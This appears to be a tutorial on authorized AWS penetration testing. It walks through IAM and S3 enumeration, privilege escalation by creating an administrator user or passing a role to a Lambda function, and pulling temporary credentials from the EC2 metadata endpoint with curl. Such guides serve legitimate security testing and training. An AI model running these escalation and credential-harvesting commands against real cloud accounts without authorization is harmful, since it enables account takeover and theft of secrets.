Cloud infrastructure has become the primary attack surface for many organizations, and AWS is the dominant platform. Cloud penetration testing requires a different mindset than traditional network pentesting — instead of finding open ports, you’re hunting for overly permissive IAM policies, exposed S3 buckets, unauthenticated metadata endpoints, and misconfigurations that allow privilege escalation within the cloud control plane.
Legal Prerequisites
Before testing any AWS environment:
- Obtain written authorization from the AWS account owner
- Review AWS Penetration Testing Policy
- AWS permits testing of your own resources without prior approval for most services (EC2, RDS, CloudFront, API Gateway, Lambda, Lightsail, Elastic Beanstalk, and ECS/ECR)
- Prohibited: DDoS testing, DNS zone walking, port flooding
Essential tools for AWS pentesting:
# AWS CLI
pip3 install awscli --break-system-packages
aws configure # Enter access key, secret key, region
# ScoutSuite — multi-cloud security auditing
pip3 install scoutsuite --break-system-packages
# Pacu — AWS exploitation framework
git clone https://github.com/RhinoSecurityLabs/pacu.git
cd pacu && pip3 install -r requirements.txt --break-system-packages
# CloudFox — cloud security tooling
wget https://github.com/BishopFox/cloudfox/releases/latest/download/cloudfox-linux-amd64.zip
unzip cloudfox-linux-amd64.zip && mv cloudfox /usr/local/bin/
# enumerate-iam
git clone https://github.com/andresriancho/enumerate-iam.git
Phase 1: Initial Enumeration with Stolen/Provided Credentials
If you have access to an IAM access key pair (common in external tests where credentials are provided as starting point):
# Configure credentials
aws configure
# Or export directly:
export AWS_ACCESS_KEY_ID=AKIA...
export AWS_SECRET_ACCESS_KEY=...
export AWS_DEFAULT_REGION=us-east-1
# Who am I?
aws sts get-caller-identity
Output reveals the account ID, user ARN, and user ID — critical for planning next steps.
Enumerate IAM permissions:
# List attached policies
aws iam list-attached-user-policies --user-name USERNAME
aws iam list-user-policies --user-name USERNAME
# Get policy details
aws iam get-policy-version --policy-arn arn:aws:iam::ACCOUNT:policy/PolicyName --version-id v1
# Use enumerate-iam for automated permission discovery
python3 enumerate-iam/enumerate-iam.py --access-key $AWS_ACCESS_KEY_ID --secret-key $AWS_SECRET_ACCESS_KEY
Phase 2: S3 Bucket Enumeration
Exposed S3 buckets remain one of the most common AWS misconfigurations:
# List all buckets in the account
aws s3 ls
# Check bucket ACL and policy
aws s3api get-bucket-acl --bucket BUCKET_NAME
aws s3api get-bucket-policy --bucket BUCKET_NAME
# List bucket contents
aws s3 ls s3://BUCKET_NAME/
# Check for public access blocks
aws s3api get-public-access-block --bucket BUCKET_NAME
# Download suspicious files
aws s3 cp s3://BUCKET_NAME/config.txt .
External bucket discovery (from outside the account):
# Try accessing without credentials
aws s3 ls s3://BUCKET_NAME --no-sign-request
# Tools for bucket enumeration
gobuster s3 -w wordlist.txt
Phase 3: IAM Privilege Escalation
AWS IAM privilege escalation is analogous to local privesc — find a permission that lets you obtain higher privileges. Common vectors:
Creating a New User or Policy
If you have iam:CreateUser + iam:AttachUserPolicy + iam:CreateAccessKey:
aws iam create-user --user-name attacker
aws iam attach-user-policy --user-name attacker --policy-arn arn:aws:iam::aws:policy/AdministratorAccess
aws iam create-access-key --user-name attacker
Lambda Execution Privesc
If you can create Lambda functions and pass an existing role:
aws lambda create-function --function-name privesc --runtime python3.9 --role arn:aws:iam::ACCOUNT:role/LambdaAdminRole --handler lambda_function.lambda_handler --zip-file fileb://function.zip
aws lambda invoke --function-name privesc output.txt
Using Pacu for Automated Privesc Discovery
cd pacu && python3 pacu.py
Pacu > import_keys --all
Pacu > run iam__enum_users_roles_policies_groups
Pacu > run iam__privesc_scan
Pacu’s iam__privesc_scan identifies all possible escalation paths based on current permissions.
If you have access to an EC2 instance (via SSRF or shell access), the metadata service exposes temporary credentials:
# IMDSv1 (deprecated but still common)
curl http://169.254.169.254/latest/meta-data/iam/security-credentials/
curl http://169.254.169.254/latest/meta-data/iam/security-credentials/ROLE_NAME
# IMDSv2 (requires token)
TOKEN=$(curl -X PUT "http://169.254.169.254/latest/api/token" -H "X-aws-ec2-metadata-token-ttl-seconds: 21600")
curl -H "X-aws-ec2-metadata-token: $TOKEN" http://169.254.169.254/latest/meta-data/iam/security-credentials/
Extracted credentials (AccessKeyId, SecretAccessKey, Token) can be used immediately with AWS CLI.
ScoutSuite: Automated Cloud Audit
ScoutSuite runs a comprehensive audit across all AWS services:
python3 -m scout aws --no-browser
# Output: scoutsuite-report/
Open the HTML report to see all findings categorized by severity across IAM, S3, EC2, RDS, Lambda, and more.
CloudFox: Finding Attack Paths
CloudFox finds attack paths in a given AWS account:
cloudfox aws -p PROFILE_NAME all-checks
cloudfox aws -p PROFILE_NAME s3
cloudfox aws -p PROFILE_NAME iam-simulator
Key Findings to Document
In a cloud pentest report, prioritize:
- Publicly readable/writable S3 buckets containing sensitive data
- IAM users/roles with
*:* permissions (AdministratorAccess)
- Exposed EC2 metadata without IMDSv2 enforcement
- Unauthenticated Lambda or API Gateway endpoints
- Secrets in Lambda environment variables or EC2 user data
- RDS databases publicly accessible
Cloud pentesting certifications worth pursuing: AWS Certified Security Specialty, Certified Cloud Pentesting Professional (CCP), and Hacking the Cloud course by Nick Frichette.